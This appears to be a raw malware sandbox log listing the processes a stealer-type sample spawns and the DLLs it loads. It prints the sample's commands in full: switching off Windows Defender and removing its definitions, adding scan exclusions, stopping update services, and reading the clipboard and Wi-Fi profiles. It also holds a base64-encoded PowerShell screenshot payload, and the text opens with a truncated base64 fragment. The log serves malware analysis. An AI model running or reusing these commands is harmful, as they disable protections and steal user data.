gAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                                  Source: unknownProcess created: C:\Recovery\HpQPPZazcv.exe C:\Recovery\HpQPPZazcv.exe
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  Source: unknownProcess created: C:\Recovery\HpQPPZazcv.exe C:\Recovery\HpQPPZazcv.exe
                                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.cmdline"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFC3.tmp" "c:\Users\user\AppData\Local\Temp\eodmidm4\CSC7CD01418C841459A9A462A9B35F4C645.TMP"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\Conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe" Jump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe" Jump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe" Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe" Jump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogymJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogymJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogymJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeProcess created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeProcess created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
                                  Source: C:\ProgramData\svchost.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
                                  Source: C:\ProgramData\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\ProgramData\setup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                  Source: C:\ProgramData\setup.exeProcess created: unknown unknown
                                  Source: C:\ProgramData\setup.exeProcess created: unknown unknown
                                  Source: C:\ProgramData\setup.exeProcess created: unknown unknown
                                  Source: C:\ProgramData\setup.exeProcess created: unknown unknown
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline"
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6DA.tmp" "c:\Windows\System32\CSC43F2928123D49B6B141C06767811123.TMP"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.cmdline"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFC3.tmp" "c:\Users\user\AppData\Local\Temp\eodmidm4\CSC7CD01418C841459A9A462A9B35F4C645.TMP"
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: dxgidebug.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: dwmapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: riched20.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: usp10.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: msls31.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: version.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: vcruntime140.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: vcruntime140.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: version.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: python3.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: libffi-7.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: sqlite3.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: libcrypto-1_1.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: libssl-1_1.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: rasadhlp.dllJump to behavior
